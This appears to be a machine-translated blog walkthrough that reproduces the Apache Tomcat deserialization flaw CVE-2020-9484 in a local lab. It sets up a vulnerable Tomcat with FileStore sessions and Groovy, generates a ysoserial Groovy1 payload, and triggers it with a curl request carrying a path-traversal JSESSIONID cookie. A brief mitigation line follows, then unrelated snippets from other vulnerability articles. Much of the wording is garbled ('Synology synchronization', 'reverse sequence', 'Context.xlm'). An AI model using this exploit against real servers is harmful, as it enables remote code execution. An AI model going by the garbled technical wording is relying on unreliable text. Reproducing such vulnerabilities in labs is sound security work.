On May 20, 2020, Beijing time, Apache officially released the risk notice of Apache Tomcat remote code, which is CVE-2020-9484.
Apache Tomcat is an open source, running a Java-based web application container based on Servlet and JSP web applications. When Tomcat uses the Synology synchronization function, use unsafe configurations (without using Encryptinterceptor) There is a reverse sequence vulnerability, and the attacker can perform Tomcat servers that use the Semiion synchronization function by carefully constructed data packets. attack.
Apache Tomcat: 10.0.0-M1 to 10.0.0-M4
Apache Tomcat: 9.0.0.M1 to 9.0.34
Apache Tomcat: 8.5.0 to 8.5.54
Apache Tomcat: 7.0.0 to 7.0.103
Requirements: virtual machine, CentOS 7 system
Install Tomcat requires JDK1.8, installing tutorials can goKali-JDK1-8 installation -
Download and install Tomcat,
wget https://repo1.maven.org/maven2/org/apache/tomcat/tomcat/10.0.0-M4/tomcat-10.0.0-M4.tar.gz

Then, create a folder to use the Tomcat directory to extract Tomcat into it.
mkdir /usr/local/tomcat
tar -zxvf tomcat-10.0.0-M4.tar.gz -C /usr/local/tomcat/

Modification /usR/local/tomcat/apache-tomcat-10.0.0-m4/conf
/Context.xlm Add Manager Save Exit
<Manager className="org.apache.catalina.session.PersistentManager">
<Store className="org.apache.catalina.session.FileStore" directory="/tomcat/sessions/"/>
</Manager>

Download Groovy-2.3.9.jar, then put the groovy-2.3.9.jar into /usr/local/tomcat/apache-tomcat-10.0.0-m4/lib
Under contents
Execute under LIB:
wget https://repo1.maven.org/maven2/org/codehaus/groovy/groovy/2.3.9/groovy-2.3.9.jar

Run Tomcat: Run Catalina.sh Start in USR / local / Tomcat / Apache-Tomcat-10.0.0-m4 / bin directory
/usr/local/tomcat/apache-tomcat-10.0.0-M4/bin/catalina.sh start

Access http://127.0.0.1:8080 port, display the following interface, explain the successful installation

Download YSOSERIAL a generated Java anti-serialization payload .jar package
Download address: https://github.com/frohoff/ysoserial.git
Download, extract, and generate a JAR package, copy the Linux system
Generate a JAR package, enter the folder's directory input command: MVN Package
Compiling is a bit slow to need a few minutes
After the completion is complete, in the target directory, there is a JAR package

Execute the following statement to generate a PayLoad
java -jar ysoserial-0.0.6-SNAPSHOT-all.jar Groovy1 "touch /tmp/2333" > /tmp/test.session

Use the following command to access Tomcat service
curl 'http://127.0.0.1:8080/index.jsp' -H 'Cookie: JSESSIONID=../../../../../tmp/test'

Although the error is displayed, it is also implemented. Create a 2333 directory in the / TMP directory

It is forbidden to use the session persistence function filestore.
Reference link:
https://github.com/masahiro331/CVE-2020-9484
https://github.com/threedr3am/tomcat-cluster-session-sync-exp
Vulnerability overview Attackers can access remote interfaces on the WebLogic Server server via the IIOP protocol, enable malicious data, giving server permissions and perform any code remotely...
Introduction Fasterxml Jackson is a Data Processing Tool for Java, USA. Jackson-Database is one of the components with data binding functions. Impact version Environmental ...
Vulnerability description XStream is a commonly used Java object and XML mutual conversion tool. On the service running XSteam, unauthorized remote attackers can cause any file to delete / server requ...
Vulnerability principle Jackson-Database supports the Polymorphic Deserialization feature (not open by default), when there is PolyMorph Fields in the Target Class, which is converted by JSON string, ...
JBoss CVE-2017-12149 reverse sequence vulnerability Vulnerability description This vulnerability is a Java anti-sequence error type, existsJboss of HttpInvoker ComponentReadOnlyAccessFilter In the fil...
Vulnerability description On January 6, 2020, the National Information Security Vulnerability Sharing Platform (CNVD) included the Apache Tomcat file discovery vulnerability reported by Beijing Changt...
table of Contents Introduction Recurring environment Recurrence process Reference article Introduction Since the AJP service (port 8009) enabled by Tomcat has a file inclusion defect, an attacker can ...
CVE-2020-1938 The vulnerability is caused by a flaw in the Tomcat AJp protocol. An attacker can use this vulnerability to read arbitrary files of the webapp under the server by constructing specific p...
0x00 Introduction Tomcat is equipped with an HTTP connector and AJP connector in Server.xml. The AJP connector can interact with another web container through the AJP protocol. The AJP protocol is a d...
Vulnerability overview YII is a set of high-performance PHP frameworks based on components that develop large web applications. The version of Yi2 2.0.38 has a reverse sequence vulnerability, a...